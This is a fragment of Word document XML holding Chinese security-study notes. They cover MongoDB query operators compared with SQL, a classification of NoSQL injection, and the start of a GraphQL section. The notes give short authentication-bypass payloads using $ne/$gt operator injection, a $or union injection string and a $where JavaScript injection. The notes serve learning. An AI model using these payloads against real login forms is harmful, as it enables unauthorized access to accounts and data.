          </w:tcPr>
          <w:p w14:paraId="051FD68A" w14:textId="77777777" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr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数据记录行/文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006832A2" w14:paraId="15E44FD0" w14:textId="0095A30C" w:rsidTr="006832A2">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="534EECEE" w14:textId="2B20F440" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="-7"/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column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B84425" w14:textId="0CF7ADBE" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="139"/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field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="079CADB3" w14:textId="77777777" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr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数据字段/域</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006832A2" w14:paraId="0588C8B0" w14:textId="1CF17552" w:rsidTr="006832A2">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BAFD01" w14:textId="78D3D7B9" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="-7"/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index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CA4CC07" w14:textId="5616084F" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="139"/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index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762E9DCE" w14:textId="77777777" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr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索引</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006832A2" w14:paraId="3B89630E" w14:textId="5FFCFA07" w:rsidTr="006832A2">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="404BEB29" w14:textId="1F6F3AC3" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="-7"/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table joins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0692D0" w14:textId="2BDF66D6" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2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0710D59C" w14:textId="77777777" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr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表连接，MongoDB 不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006832A2" w14:paraId="4E845CEC" w14:textId="5416FB74" w:rsidTr="006832A2">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EBCDD59" w14:textId="67D23E72" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="-7"/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primary key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00A818F8" w14:textId="77777777" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="139"/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primary key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10B97F37" w14:textId="307481E6" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF4CCF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>主键，MongoDB 自动将 _id 字段设置为主键</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74F6A2DC" w14:textId="77777777" w:rsidR="009E6368" w:rsidRDefault="009E6368" w:rsidP="009E6368">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc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86"/>
        <w:gridCol w:w="1704"/>
        <w:gridCol w:w="2763"/>
        <w:gridCol w:w="1913"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E6368" w:rsidRPr="009E6368" w14:paraId="2D6FEF5C" w14:textId="77777777" w:rsidTr="00375822">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BBF326C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  <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30FE3D91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格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2763" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="248C9F78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范例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41CE967C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 xml:space="preserve">RDBMS </w:t>
            </w:r>
            <w:r w:rsidRPr="009E6368">
              <w:rPr>
                <w:rStyle w:val="afc"/>
              </w:rPr>
              <w:t>中的类似语句</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E6368" w:rsidRPr="009E6368" w14:paraId="1A699712" w14:textId="77777777" w:rsidTr="00375822">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3E6DDF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  <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等于</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0809C880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{&lt;key&gt;:&lt;value&gt;}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2763" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5D8AB9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db.love.find({"name":"whoami"}).pretty()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="719FCC32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where name = 'whoami'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E6368" w:rsidRPr="009E6368" w14:paraId="3D6E3D84" w14:textId="77777777" w:rsidTr="00375822">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD55F95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  <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>小于</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C0D35D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{&lt;key&gt;:{$lt:&lt;value&gt;}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2763" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B795067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db.love.find({"age":{$lt:19}}).pretty()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580E7368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where age &lt; 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E6368" w:rsidRPr="009E6368" w14:paraId="30535599" w14:textId="77777777" w:rsidTr="00375822">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="493AB789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  <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>小于或等于</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C9FE0A7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{&lt;key&gt;:{$lte:&lt;value&gt;}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2763" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C7A575C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db.love.find({"age":{$lte:19}}).pretty()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C764575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where likes &lt;= 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E6368" w:rsidRPr="009E6368" w14:paraId="5A8C9B9D" w14:textId="77777777" w:rsidTr="00375822">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08079BFD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  <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>大于</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F7DE60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{&lt;key&gt;:{$gt:&lt;value&gt;}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2763" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E1ADBD3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db.love.find({"age":{$gt:19}}).pretty()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="376FE40D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where likes &gt; 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E6368" w:rsidRPr="009E6368" w14:paraId="7EFEDA3B" w14:textId="77777777" w:rsidTr="00375822">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F3ACE85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  <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>大于或等于</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E11A126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{&lt;key&gt;:{$gte:&lt;value&gt;}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2763" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35603108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db.love.find({"age":{$gte:19}}).pretty()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4645CE0E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where likes &gt;= 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E6368" w:rsidRPr="009E6368" w14:paraId="2072B402" w14:textId="77777777" w:rsidTr="00375822">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1206FFE6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  <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不等于</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3193D4C6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{&lt;key&gt;:{$ne:&lt;value&gt;}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2763" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F568EF1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db.love.find({"age":{$ne:19}}).pretty()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06B67352" w14:textId="77777777" w:rsidR="009E6368" w:rsidRPr="009E6368" w:rsidRDefault="009E6368" w:rsidP="00F10B7E">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="afc"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E6368">
              <w:rPr>
                <w:rStyle w:val="afc"/>
              </w:rPr>
              <w:t>where likes != 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DD8E3CE" w14:textId="77777777" w:rsidR="009E6368" w:rsidRDefault="009E6368" w:rsidP="00491A70"/>
    <w:p w14:paraId="14FA3D59" w14:textId="77777777" w:rsidR="009E6368" w:rsidRDefault="009E6368" w:rsidP="00491A70"/>
    <w:p w14:paraId="1A34F15D" w14:textId="14A83B5E" w:rsidR="00491A70" w:rsidRDefault="00491A70" w:rsidP="00491A70">
      <w:r>
        <w:t>NoSQL 注入的分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F7479" w14:textId="0BCEE98D" w:rsidR="00491A70" w:rsidRDefault="00491A70" w:rsidP="00491A70">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有两种</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NoSQL 注入分类的方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE889D1" w14:textId="36003F14" w:rsidR="00491A70" w:rsidRPr="00491A70" w:rsidRDefault="00491A70" w:rsidP="00491A70">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一种是按照语言的分类，可以分为：</w:t>
      </w:r>
      <w:r>
        <w:t>PHP 数组注入，JavaScript 注入和 Mongo Shell 拼接注入等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F9338" w14:textId="0F6F6647" w:rsidR="00A55C13" w:rsidRDefault="00491A70" w:rsidP="00491A70">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二种是按照攻击机制分类，可以分为：重言式注入，联合查询注入，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 注入、盲注等，这种分类方式很像传统 SQL 注入的分类方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707BA556" w14:textId="2AB19413" w:rsidR="00A55C13" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:t>重言式注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC11BEA" w14:textId="33358E70" w:rsidR="0088307B" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r w:rsidRPr="0088307B">
        <w:t>payload:username[$ne]=1&amp;password[$ne]=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00258ADA" w14:textId="47D753AB" w:rsidR="00A55C13" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:t>PHP本身的特性而言，由于其松散的数组特性，导致如果我们输入value=1那么，也就是输入了一个value的值为1的数据。如果输入value[$ne]=1也就意味着value=array($ne=&gt;1),在MongoDB中，原来的一个单个目标的查询变成了条件查询。同样的，我们也可以使用username[$gt]=&amp;password[$gt]=作为payload进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C3639" w14:textId="6A980F9E" w:rsidR="00A55C13" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:t xml:space="preserve"> NoSQL联合查询注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF36A6" w14:textId="77777777" w:rsidR="0088307B" w:rsidRPr="0088307B" w:rsidRDefault="0088307B" w:rsidP="0088307B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>string query ="{ username: '" + post_username + "', password: '" + post_password + "' }"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA6DF2" w14:textId="7FC476CD" w:rsidR="0088307B" w:rsidRPr="0088307B" w:rsidRDefault="0088307B" w:rsidP="0088307B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496B92D" w14:textId="7348A7EA" w:rsidR="00A55C13" w:rsidRPr="0088307B" w:rsidRDefault="0088307B" w:rsidP="0088307B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>username=tolkien', $or: [ {}, { 'a':'a&amp;password=' } ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B88B2EA" w14:textId="0F89C51D" w:rsidR="00A55C13" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是现在无论是</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:t>PHP的MongoDB driver还是node.js的mongoose都要求查询条件必须是一个数组或者对象了，因此简单看一下就好。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF8655" w14:textId="08BF0DC6" w:rsidR="00A55C13" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:t xml:space="preserve"> JavaScript注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24801DA7" w14:textId="2F241F0F" w:rsidR="0088307B" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r w:rsidRPr="0088307B">
        <w:t>$where操作符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77298B78" w14:textId="7CC2AA95" w:rsidR="00A55C13" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:t>MongoDB中 $where操作符是可以执行JavaScript语句的,在MongoDB 2.4之前，通过$where操作符使用map-reduce、group命令可以访问到mongo shell中的全局函数和属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5317016D" w14:textId="1DFEF84B" w:rsidR="0088307B" w:rsidRPr="0088307B" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="0088307B">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>username=1&amp;password=1;return true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7E360" w14:textId="77777777" w:rsidR="00A55C13" w:rsidRDefault="00A55C13" w:rsidP="00CB0C16"/>
    <w:p w14:paraId="0DB4FCEF" w14:textId="5988056C" w:rsidR="00CB0C16" w:rsidRDefault="00A55C13" w:rsidP="00CB0C16">
      <w:r>
        <w:t>NOSQL</w:t>
      </w:r>
      <w:r w:rsidR="00CB0C16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidR="00CB0C16" w:rsidRPr="00CB0C16">
        <w:t>https://www.cnblogs.com/bonelee/p/12158385.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5244F892" w14:textId="32F5CE5B" w:rsidR="0088307B" w:rsidRDefault="0088307B" w:rsidP="00CB0C16">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属实不太懂T</w:t>
      </w:r>
      <w:r>
        <w:t>-T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA5705" w14:textId="10E92C1E" w:rsidR="00EA3AD9" w:rsidRDefault="00EA3AD9" w:rsidP="00CB0C16"/>
    <w:p w14:paraId="5C4E3172" w14:textId="654E62F9" w:rsidR="00EA3AD9" w:rsidRDefault="00EA3AD9" w:rsidP="00EA3AD9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B37D60F" w14:textId="1A19A661" w:rsidR="007963EB" w:rsidRPr="007963EB" w:rsidRDefault="007963EB" w:rsidP="007963EB">
      <w:r w:rsidRPr="007963EB">
        <w:t>GraphQL最终与程序员编写的任意代码进行交互。GraphQL本身无法阻止任何类型的攻击，因此，如果他们犯了错误（例如，未使用参数化查询），则该应用程序可能会受到SQL注入攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19398795" w14:textId="66DD3FD6" w:rsidR="00EA3AD9" w:rsidRDefault="007963EB" w:rsidP="00EA3AD9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本查询语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581ED33B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>query{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A5EF1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ab/>
        <w:t>user{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A391B98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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE45A1A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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12618704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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>firstName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428569B0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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>lastName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334587C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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E6E775" w14:textId="79228EAD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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC8830D" w14:textId="091F5533" w:rsidR="007963EB" w:rsidRDefault="007963EB" w:rsidP="007963EB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B78A3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>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0032C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ab/>
        <w:t>"data": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B66F6D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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>"user": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD642A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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>"id": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758941B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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>"email": "paolo@doyensec.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36C72C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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>"firstName": "Paolo",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83A418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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>"lastName": "Stagno"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B2700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ab/>
      </w:r>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355415A0" w14:textId="77777777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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9EAF3" w14:textId="75CE60CE" w:rsidR="007963EB" w:rsidRPr="007963EB" w:rsidRDefault="007963EB" w:rsidP="007963EB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007963EB">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612DD783" w14:textId="36B1AB69" w:rsidR="007963EB" w:rsidRDefault="007963EB" w:rsidP="007963EB"/>
    <w:p w14:paraId="5909A76C" w14:textId="6268B0A0" w:rsidR="007963EB" w:rsidRDefault="007963EB" w:rsidP="007963EB"/>
